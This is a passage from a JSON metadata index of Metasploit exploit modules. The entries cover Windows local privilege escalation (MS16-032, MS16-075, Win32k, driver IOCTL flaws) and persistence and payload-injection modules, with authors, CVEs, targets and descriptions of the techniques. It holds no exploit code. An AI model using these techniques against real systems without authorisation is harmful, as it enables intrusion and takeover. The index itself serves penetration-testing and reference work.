"rank": 300,
"disclosure_date": "2016-03-21",
"type": "exploit",
"author": [
"James Forshaw",
"b33f",
"khr0x40sh"
],
"description": "This module exploits the lack of sanitization of standard handles in Windows' Secondary\n Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12\n 32 and 64 bit. This module will only work against those versions of Windows with\n Powershell 2.0 or later and systems with two or more CPU cores.",
"references": [
"MS-MS16-032",
"CVE-2016-0099",
"URL-https://twitter.com/FuzzySec/status/723254004042612736",
"URL-https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb",
"is_install_path": true,
"ref_name": "windows/local/ms16_032_secondary_logon_handle_privesc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms16_075_reflection": {
"name": "Windows Net-NTLMv2 Reflection DCOM/RPC",
"full_name": "exploit/windows/local/ms16_075_reflection",
"rank": 300,
"disclosure_date": "2016-01-16",
"type": "exploit",
"author": [
"FoxGloveSec",
"breenmachine",
"Mumbai"
],
"description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. Currently the module\n does not spawn as SYSTEM; however, once a shell is obtained, incognito can\n easily be used to impersonate the token.",
"references": [
"MSB-MS16-075",
"CVE-2016-3225",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/",
"URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
"URL-https://github.com/breenmachine/RottenPotatoNG"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows x86",
"Windows x64"
],
"mod_time": "2018-10-04 16:38:35 +0000",
"path": "/modules/exploits/windows/local/ms16_075_reflection.rb",
"is_install_path": true,
"ref_name": "windows/local/ms16_075_reflection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms16_075_reflection_juicy": {
"name": "Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)",
"full_name": "exploit/windows/local/ms16_075_reflection_juicy",
"rank": 500,
"disclosure_date": "2016-01-16",
"type": "exploit",
"author": [
"FoxGloveSec",
"breenmachine",
"decoder",
"ohpe",
"phra",
"lupman"
],
"description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege.\n It requires a CLSID string.",
"references": [
"MSB-MS16-075",
"CVE-2016-3225",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/",
"URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
"URL-https://github.com/breenmachine/RottenPotatoNG",
"URL-https://decoder.cloud/2017/12/23/the-lonely-potato/",
"URL-https://ohpe.it/juicy-potato/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-12 04:32:21 +0000",
"path": "/modules/exploits/windows/local/ms16_075_reflection_juicy.rb",
"is_install_path": true,
"ref_name": "windows/local/ms16_075_reflection_juicy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms18_8120_win32k_privesc": {
"name": "Windows SetImeInfoEx Win32k NULL Pointer Dereference",
"full_name": "exploit/windows/local/ms18_8120_win32k_privesc",
"rank": 400,
"disclosure_date": "2018-05-09",
"type": "exploit",
"author": [
"unamer",
"bigric3",
"Anton Cherepanov",
"Dhiraj Mishra <dhiraj@notsosecure.com>"
],
"description": "This module exploits an elevation of privilege vulnerability in Windows 7 and 2008 R2\n that occurs when the Win32k component fails to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run arbitrary code in kernel mode. An\n attacker could then install programs; view, change, or delete data; or create new\n accounts with full user rights.\n\n This module has been tested against Windows 7 x86, Windows 7 x64 and Windows Server 2008 R2 Standard x64.",
"references": [
"BID-104034",
"CVE-2018-8120",
"URL-https://github.com/unamer/CVE-2018-8120",
"URL-https://github.com/bigric3/cve-2018-8120",
"URL-http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html",
"URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 7 x64",
"Windows 7 x86"
],
"mod_time": "2018-10-18 14:30:20 +0000",
"path": "/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb",
"is_install_path": true,
"ref_name": "windows/local/ms18_8120_win32k_privesc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms_ndproxy": {
"name": "MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation",
"full_name": "exploit/windows/local/ms_ndproxy",
"rank": 200,
"disclosure_date": "2013-11-27",
"type": "exploit",
"author": [
"Unknown",
"ryujin",
"Shahin Ramezany",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003\n SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while\n processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used\n to access an array unsafely, and the value is used to perform a call, leading to a NULL\n pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This\n module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to\n work the service \"Routing and Remote Access\" must be running on the target system.",
"references": [
"CVE-2013-5065",
"MSB-MS14-002",
"OSVDB-100368",
"BID-63971",
"EDB-30014",
"URL-http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/",
"URL-http://technet.microsoft.com/en-us/security/advisory/2914486",
"URL-http://www.secniu.com/blog/?p=53",
"URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html",
"URL-http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3",
"Windows Server 2003 SP2"
],
"mod_time": "2018-03-29 12:03:33 +0000",
"path": "/modules/exploits/windows/local/ms_ndproxy.rb",
"is_install_path": true,
"ref_name": "windows/local/ms_ndproxy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/novell_client_nicm": {
"name": "Novell Client 2 SP3 nicm.sys Local Privilege Escalation",
"full_name": "exploit/windows/local/novell_client_nicm",
"rank": 200,
"disclosure_date": "2013-05-22",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a flaw in the nicm.sys driver to execute arbitrary code in\n kernel space. The vulnerability occurs while handling ioctl requests with code\n 0x143B6B, where a user provided pointer is used as function pointer. The module\n has been tested successfully on Windows 7 SP1 with Novell Client 2 SP3.",
"references": [
"CVE-2013-3956",
"OSVDB-93718",
"URL-http://www.novell.com/support/kb/doc.php?id=7012497",
"URL-http://pastebin.com/GB4iiEwR"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 7 SP1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/local/novell_client_nicm.rb",
"is_install_path": true,
"ref_name": "windows/local/novell_client_nicm",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/novell_client_nwfs": {
"name": "Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation",
"full_name": "exploit/windows/local/novell_client_nwfs",
"rank": 200,
"disclosure_date": "2008-06-26",
"type": "exploit",
"author": [
"Ruben Santamarta",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel\n space. The corruption occurs while handling ioctl requests with code 0x1438BB,\n where a 0x00000009 dword is written to an arbitrary address. An entry within the\n HalDispatchTable is overwritten in order to execute arbitrary code when\n NtQueryIntervalProfile is called. The module has been tested successfully on\n Windows XP SP3 with Novell Client 4.91 SP4.",
"references": [
"CVE-2008-3158",
"OSVDB-46578",
"BID-30001"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/local/novell_client_nwfs.rb",
"is_install_path": true,
"ref_name": "windows/local/novell_client_nwfs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ntapphelpcachecontrol": {
"name": "MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check",
"full_name": "exploit/windows/local/ntapphelpcachecontrol",
"rank": 300,
"disclosure_date": "2014-09-30",
"type": "exploit",
"author": [
"James Forshaw",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "On Windows, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)\n allows application compatibility data to be cached for quick reuse when new processes are\n created. A normal user can query the cache but cannot add new cached entries as the\n operation is restricted to administrators. This is checked in the function\n AhcVerifyAdminContext.\n\n This function has a vulnerability where it doesn't correctly check the impersonation token\n of the caller to determine if the user is an administrator. It reads the caller's\n impersonation token using PsReferenceImpersonationToken and then does a comparison between\n the user SID in the token and LocalSystem's SID. It doesn't check the impersonation level\n of the token, so it's possible to get an identification-level token on your thread from a local system\n process and bypass this check.\n\n This module currently only works on Windows 8 and Windows 8.1, and requires access to\n C:\\Windows\\System\\ComputerDefaults.exe (although this can be improved).",
"references": [
"MSB-MS15-001",
"CVE-2015-0002",
"OSVDB-116497",
"EDB-35661",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=118"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 8 / Windows 8.1 (x86 and x64)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ntapphelpcachecontrol.rb",
"is_install_path": true,
"ref_name": "windows/local/ntapphelpcachecontrol",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/nvidia_nvsvc": {
"name": "Nvidia (nvsvc) Display Driver Service Local Privilege Escalation",
"full_name": "exploit/windows/local/nvidia_nvsvc",
"rank": 200,
"disclosure_date": "2012-12-25",
"type": "exploit",
"author": [
"Peter Wintersmith",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "The named pipe, \\pipe\\nsvr, has a NULL DACL allowing any authenticated user to\n interact with the service. It contains a stack-based buffer overflow as a result\n of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',\n the service name is 'nvsvc', and the named pipe is 'nsvr'.\n\n This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.\n It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.",
"references": [
"CVE-2013-0109",
"OSVDB-88745",
"URL-http://nvidia.custhelp.com/app/answers/detail/a_id/3288"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/nvidia_nvsvc.rb",
"is_install_path": true,
"ref_name": "windows/local/nvidia_nvsvc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/panda_psevents": {
"name": "Panda Security PSEvents Privilege Escalation",
"full_name": "exploit/windows/local/panda_psevents",
"rank": 600,
"disclosure_date": "2016-06-27",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"Security-Assessment.com"
],
"description": "PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges.\n When run, it checks a user writable folder for certain DLL files, and if any are found\n they are automatically run.\n Vulnerable Products:\n Panda Global Protection 2016 (<=16.1.2)\n Panda Antivirus Pro 2016 (<=16.1.2)\n Panda Small Business Protection (<=16.1.2)\n Panda Internet Security 2016 (<=16.1.2)",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/panda_psevents.rb",
"is_install_path": true,
"ref_name": "windows/local/panda_psevents",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/payload_inject": {
"name": "Windows Manage Memory Payload Injection",
"full_name": "exploit/windows/local/payload_inject",
"rank": 600,
"disclosure_date": "2011-10-12",
"type": "exploit",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will inject a payload into the memory of a process. If a payload\n isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID\n datastore option isn't specified, then it'll inject into notepad.exe instead.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2018-11-02 14:57:41 +0000",
"path": "/modules/exploits/windows/local/payload_inject.rb",
"is_install_path": true,
"ref_name": "windows/local/payload_inject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/persistence": {
"name": "Windows Persistent Registry Startup Payload Installer",
"full_name": "exploit/windows/local/persistence",
"rank": 600,
"disclosure_date": "2011-10-19",
"type": "exploit",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"g0tmi1k"
],
"description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/persistence_service": {
"name": "Windows Persistent Service Installer",
"full_name": "exploit/windows/local/persistence_service",
"rank": 600,
"disclosure_date": "2018-10-20",
"type": "exploit",
"author": [
"Green-m <greenm.xxoo@gmail.com>"
],
"description": "This module will generate and upload an executable to the remote host, then install it as a persistent service.\n It creates a new service which will start the payload whenever the service is running. Admin or SYSTEM\n privileges are required.",
"references": [
"URL-https://github.com/rapid7/metasploit-framework/blob/master/external/source/metsvc/src/metsvc.cpp"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2018-12-17 07:00:23 +0000",
"path": "/modules/exploits/windows/local/persistence_service.rb",
"is_install_path": true,
"ref_name": "windows/local/persistence_service",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/powershell_cmd_upgrade": {
"name": "Windows Command Shell Upgrade (Powershell)",
"full_name": "exploit/windows/local/powershell_cmd_upgrade",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module executes Powershell to upgrade a Windows Shell session\n to a full Meterpreter session.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/powershell_cmd_upgrade.rb",
"is_install_path": true,
"ref_name": "windows/local/powershell_cmd_upgrade",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/powershell_remoting": {
"name": "Powershell Remoting Remote Command Execution",
"full_name": "exploit/windows/local/powershell_remoting",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module uses Powershell Remoting (TCP 47001) to inject payloads on target machines.\n If RHOSTS are specified, it will try to resolve the IPs to hostnames, otherwise\n use a HOSTFILE to supply a list of known hostnames.",
"references": [
"CVE-1999-0504",
"OSVDB-3106"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/powershell_remoting.rb",
"is_install_path": true,
"ref_name": "windows/local/powershell_remoting",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ppr_flatten_rec": {
"name": "Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation",
"full_name": "exploit/windows/local/ppr_flatten_rec",
"rank": 200,
"disclosure_date": "2013-05-15",
"type": "exploit",
"author": [
"Tavis Ormandy <taviso@cmpxchg8b.com>",
"progmboy <programmeboy@gmail.com>",
"Keebie4e",
"egypt <egypt@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"juan vazquez <juan.vazquez@metasploit.com>",
"OJ Reeves"
],
"description": "This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage\n of uninitialized data which allows to corrupt memory. At the moment, the module has\n been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.",
"references": [
"CVE-2013-3660",
"EDB-25912",
"OSVDB-93539",
"MSB-MS13-053",
"URL-https://seclists.org/fulldisclosure/2013/May/91"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-11-25 05:09:16 +0000",
"path": "/modules/exploits/windows/local/ppr_flatten_rec.rb",
"is_install_path": true,
"ref_name": "windows/local/ppr_flatten_rec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ps_persist": {
"name": "Powershell Payload Execution",
"full_name": "exploit/windows/local/ps_persist",
"rank": 600,
"disclosure_date": "2012-08-14",
"type": "exploit",
"author": [
"RageLtMan <rageltman@sempervictus>",
"Matt \"hostess\" Andreko"
],
"description": "This module generates a dynamic executable on the session host using .NET templates.\n Code is pulled from C# templates and impregnated with a payload before being\n sent to a modified PowerShell session with .NET 4 loaded. The compiler builds\n the executable (standard or Windows service) in memory and produces a binary\n which can be started/installed and downloaded for later use. After compilation the\n PoweShell session can also sign the executable if provided a path the a .pfx formatted\n certificate.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-09-27 07:41:06 +0000",
"path": "/modules/exploits/windows/local/ps_persist.rb",
"is_install_path": true,
"ref_name": "windows/local/ps_persist",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ps_wmi_exec": {
"name": "Authenticated WMI Exec via Powershell",
"full_name": "exploit/windows/local/ps_wmi_exec",
"rank": 600,
"disclosure_date": "2012-08-19",
"type": "exploit",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module uses WMI execution to launch a payload instance on a remote machine.\n In order to avoid AV detection, all execution is performed in memory via psh-net\n encoded payload. Persistence option can be set to keep the payload looping while\n a handler is present to receive it. By default the module runs as the current\n process owner. The module can be configured with credentials for the remote host\n with which to launch the process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ps_wmi_exec.rb",
"is_install_path": true,
"ref_name": "windows/local/ps_wmi_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/pxeexploit": {
"name": "PXE Exploit Server",
"full_name": "exploit/windows/local/pxeexploit",
"rank": 600,
"disclosure_date": "2011-08-05",
"type": "exploit",
"author": [
"scriptjunkie"
],
"description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing the payload on the hard drive of any Windows\n partition seen.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/pxeexploit.rb",
"is_install_path": true,
"ref_name": "windows/local/pxeexploit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/razer_zwopenprocess": {
"name": "Razer Synapse rzpnk.sys ZwOpenProcess",
"full_name": "exploit/windows/local/razer_zwopenprocess",
"rank": 300,
"disclosure_date": "2017-03-22",
"type": "exploit",
"author": [
"Spencer McIntyre"
],
"description": "A vulnerability exists in the latest version of Razer Synapse\n (v2.20.15.1104 as of the day of disclosure) which can be leveraged\n locally by a malicious application to elevate its privileges to those of\n NT_AUTHORITY\\SYSTEM. The vulnerability lies in a specific IOCTL handler\n in the rzpnk.sys driver that passes a PID specified by the user to\n ZwOpenProcess. This can be issued by an application to open a handle to\n an arbitrary process with the necessary privileges to allocate, read and\n write memory in the specified process.\n\n This exploit leverages this vulnerability to open a handle to the\n winlogon process (which runs as NT_AUTHORITY\\SYSTEM) and infect it by\n installing a hook to execute attacker controlled shellcode. This hook is\n then triggered on demand by calling user32!LockWorkStation(), resulting\n in the attacker's payload being executed with the privileges of the\n infected winlogon process. In order for the issued IOCTL to work, the\n RazerIngameEngine.exe process must not be running. This exploit will\n check if it is, and attempt to kill it as necessary.\n\n The vulnerable software can be found here:\n https://www.razerzone.com/synapse/. No Razer hardware needs to be\n connected in order to leverage this vulnerability.\n\n This exploit is not opsec-safe due to the user being logged out as part\n of the exploitation process.",
"references": [
"CVE-2017-9769",
"URL-https://warroom.securestate.com/cve-2017-9769/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/razer_zwopenprocess.rb",
"is_install_path": true,
"ref_name": "windows/local/razer_zwopenprocess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-restarts"
],
"SideEffects": [
"screen-effects"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_windows/local/registry_persistence": {
"name": "Windows Registry Only Persistence",
"full_name": "exploit/windows/local/registry_persistence",
"rank": 600,
"disclosure_date": "2015-07-01",
"type": "exploit",
"author": [
"Donny Maasland <donny.maasland@fox-it.com>"
],
"description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n The payload will be installed completely in registry.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-29 18:14:56 +0000",
"path": "/modules/exploits/windows/local/registry_persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/registry_persistence",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/run_as": {
"name": "Windows Run Command As User",
"full_name": "exploit/windows/local/run_as",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Kx499",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will login with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default.\n Unless targeting a local user either set the DOMAIN, or specify a UPN user\n format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function.\n\n A custom command line can be sent instead of uploading an executable.\n APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine\n respectively. See the MSDN documentation for how these two values interact.",
"references": [
"URL-https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/run_as.rb",
"is_install_path": true,
"ref_name": "windows/local/run_as",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/s4u_persistence": {
"name": "Windows Manage User Level Persistent Payload Installer",
"full_name": "exploit/windows/local/s4u_persistence",
"rank": 600,
"disclosure_date": "2013-01-02",
"type": "exploit",
"author": [
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>"
],
"description": "Creates a scheduled task that will run using service-for-user (S4U).\n This allows the scheduled task to run even as an unprivileged user\n that is not logged into the device. This will result in lower security\n context, allowing access to local resources only. The module\n requires 'Logon as a batch job' permissions (SeBatchLogonRight).",
"references": [
"URL-http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/",
"URL-http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/s4u_persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/s4u_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/service_permissions": {
"name": "Windows Escalate Service Permissions Local Privilege Escalation",
"full_name": "exploit/windows/local/service_permissions",
"rank": 500,
"disclosure_date": "2012-10-15",
"type": "exploit",
"author": [
"scriptjunkie"
],
"description": "This module attempts to exploit existing administrative privileges to obtain\n a SYSTEM session. If directly creating a service fails, this module will inspect\n existing services to look for insecure file or configuration permissions that may\n be hijacked. It will then attempt to restart the replaced service to run the\n payload. This will result in a new session when this succeeds.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/service_permissions.rb",
"is_install_path": true,
"ref_name": "windows/local/service_permissions",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/trusted_service_path": {
"name": "Windows Service Trusted Path Privilege Escalation",
"full_name": "exploit/windows/local/trusted_service_path",
"rank": 600,
"disclosure_date": "2001-10-25",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n is handled. When the lpApplicationName contains a space, the file name is\n ambiguous. Take this file path as example: C:\\program files\\hello.exe;\n The Windows API will try to interpret this as two possible paths:\n C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n To some software developers, this is an unexpected behavior, which becomes a\n security problem if an attacker is able to place a malicious executable in one\n of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n same problem.\n\n The offensive technique is also described in Writing Secure Code (2nd Edition),\n Chapter 23, in the section \"Calling Processes Security\" on page 676.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx",
"URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/trusted_service_path.rb",
"is_install_path": true,
"ref_name": "windows/local/trusted_service_path",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/virtual_box_guest_additions": {
"name": "VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation",
"full_name": "exploit/windows/local/virtual_box_guest_additions",
"rank": 200,
"disclosure_date": "2014-07-15",
"type": "exploit",
"author": [
"Matt Bergin <level@korelogic.com>",
"Jay Smith <jsmith@korelogic.com>"
],
"description": "A vulnerability within the VBoxGuest driver allows an attacker to inject memory they\n control into an arbitrary location they define. This can be used by an attacker to\n overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest\n Additions up to 4.3.10r93012.",
"references": [
"CVE-2014-2477",
"URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/virtual_box_guest_additions.rb",
"is_install_path": true,
"ref_name": "windows/local/virtual_box_guest_additions",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/virtual_box_opengl_escape": {
"name": "VirtualBox 3D Acceleration Virtual Machine Escape",
